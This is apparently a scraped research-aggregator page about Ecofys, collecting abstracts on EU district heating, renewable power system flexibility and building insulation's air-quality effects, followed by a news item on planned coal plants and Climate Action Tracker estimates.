Connolly D.,University of Aalborg |
Lund H.,University of Aalborg |
Mathiesen B.V.,University of Aalborg |
Werner S.,Halmstad University |
And 6 more authors.
Energy Policy | Year: 2014
Six different strategies have recently been proposed for the European Union (EU) energy system in the European Commission's report, Energy Roadmap 2050. The objective for these strategies is to identify how the EU can reach its target of an 80% reduction in annual greenhouse gas emissions in 2050 compared to 1990 levels. None of these scenarios involve the large-scale implementation of district heating, but instead they focus on the electrification of the heating sector (primarily using heat pumps) and/or the large-scale implementation of electricity and heat savings. In this paper, the potential for district heating in the EU between now and 2050 is identified, based on extensive and detailed mapping of the EU heat demand and various supply options. Subsequently, a new 'district heating plus heat savings' scenario is technically and economically assessed from an energy systems perspective. The results indicate that with district heating, the EU energy system will be able to achieve the same reductions in primary energy supply and carbon dioxide emissions as the existing alternatives proposed. However, with district heating these goals can be achieved at a lower cost, with heating and cooling costs reduced by approximately 15%. © 2013 Elsevier Ltd. Source
Papaefthymiou G.,Ecofys |
Papaefthymiou G.,Technical University of Delft |
Dragoon K.,Flink Energy Consulting
Energy Policy | Year: 2016
Relying almost entirely on energy from variable renewable resources such as wind and solar energy will require a transformation in the way power systems are planned and operated. This paper outlines the necessary steps in creating power systems with the flexibility needed to maintain stability and reliability while relying primarily on variable energy resources. These steps are provided in the form of a comprehensive overview of policies, technical changes, and institutional systems, organized in three development phases: an initial phase (penetration up to about 10%) characterized by relatively mild changes to conventional power system operations and structures; a dynamic middle phase (up to about 50% penetration) characterized by phasing out conventional generation and a concerted effort to wring flexibility from existing infrastructure; and the high penetration phase that inevitably addresses how power systems operate over longer periods of weeks or months when variable generation will be in either short supply, or in over-abundance. Although this transition is likely a decades-long and incremental process and depends on the specifics of each system, the needed policies, research, demonstration projects and institutional changes need to start now precisely because of the complexity of the transformation. The list of policy actions presented in this paper can serve as a guideline to policy makers on effectuating the transition and on tracking the preparedness of systems. © 2016 Elsevier Ltd. Source
Korsholm U.S.,Danish Meteorological Institute |
Amstrup B.,Danish Meteorological Institute |
Boermans T.,Ecofys |
Sorensen J.H.,Danish Meteorological Institute |
Zhuang S.,Danish Meteorological Institute
Atmospheric Environment | Year: 2012
The effects of building insulation on ground-level concentration levels of air pollutants are considered. We have estimated regionally averaged reductions in energy consumption between 2005 and 2020 by comparing a business as usual with a very low energy building scenario for the EU-25. The corresponding reductions in air pollutant emissions were calculated using emission factors. Annual simulations with an air-quality model, where only the emission reductions due to insulation was accounted for, were compared for the scenarios, and statistically significant changes in ground-level mass concentration of main air pollutants were found. Emission reductions of up to 9% in particulate matter and 6.3% for sulphur dioxide were found in north-western Europe. Emission changes were negligible for volatile organic compounds, and carbon monoxide decreased by 0.6% over southern Europe while nitrogen oxides changed by up to 2.5% in the Baltic region. Seasonally and regionally averaged changes in ground-level mass concentrations showed that sulphur dioxide decreased by up to 6.2% and particulate matter by up to 3.6% in north-western Europe. Nitrogen oxide concentrations decreased by 1.7% in Poland and increases of up to 0.6% were found for ozone. Carbon monoxide changes were negligible throughout the modelling domain. © 2012 Elsevier Ltd. Source
On March 11, 2016, a consortium made up of Ecofys, the International Institute for Applied Systems Analysis , and E4tech announced that the final report on the Land Use Change study is now available online. The study was commissioned and funded by the European Commission and was focused on using the GLOBIOM model to determine ILUC associated with the ten percent renewable energy use target for transportation mandated by the European Union's 2020 goals. Start the conversation, or Read more at JD Supra.
Greenhouse gas emitted by 2,440 potential coal plants -- on top of those already in operation -- would breach the UN target of restricting the planet's temperature rise, according to a mid-range estimate by Climate Action Tracker (AFP Photo/Patrik Stollarz) More Le Bourget (France) (AFP) - While scientists agree humanity needs to phase out coal within 35 years, thousands of new plants are being planned that would doom hopes of keeping global warming to safer levels, analysts said Tuesday. Greenhouse gas emitted by these 2,440 potential plants -- on top of those already in operation -- would breach the UN target of restricting the planet's temperature rise, according to a mid-range estimate by Climate Action Tracker (CAT), a respected research group. Members of the UN are striving for a pact to keep warming under two degrees Celsius (3.6 degrees Fahrenheit) higher than pre-industrial levels. Even if no new plants are built, emissions from coal-fired power generation in 2030 would be about 150 percent higher than they should be for staying under the 2C ceiling, said the CAT report, issued on the sidelines of the climate talks in Le Bourget. "There is a solution to this issue of too many coal plants on the books: cancel them," said Pieter van Breevoort of Ecofys, an energy research organisation which is part of the CAT project. "Renewable energy and stricter pollution standards are making coal plants obsolete around the world, and the earlier a coal plant is taken out of the planning process, the less it will cost." Cutting emissions is a core aim of 195 nations spending the next 10 days in Paris negotiating what is touted as a landmark post-2020 deal to roll back global warming. Despite the need to phase out greenhouse gas pollution from the energy sector, many nations -- including the United States and European Union countries -- are planning to build new coal-burning plants. New capacity is also a key plank in the energy strategies of emerging giants like China and India, seeking a cheap and plentiful fuel for their growing economies and populations. The planned new plants -- along with existing ones which will still be running in 2030 -- would send global emissions some 400 percent over the trajectory 2 C, according to the CAT report, compiled by four climate change research bodies. The estimate is based on a middle-of-the-range scenario for emissions. It said there are ways to increase coal use safely, but these would require large sums of money spent in the second half of the century on technology, including capturing and storing carbon emissions. With carbon capture and storage (CCS) technology, emissions from power plants and other sources like steel mills are trapped and stored underground, out of harm's way. Doing so would add significantly to the cost of cutting emissions, raising questions of its viability. "Renewables are so cheap that it does not make sense to deploy CCS... It's simply too expensive," Bill Hare, chief executive of the Climate Analytics thinktank, told reporters in Paris. "From the CO2 emissions reduction perspective, we are far better off going to renewables and efficiency." | <urn:uuid:e0311e67-eff6-48e5-9051-93582f46bad9> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/ecofys-220759/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00189-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.932975 | 1,670 | 2.71875 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.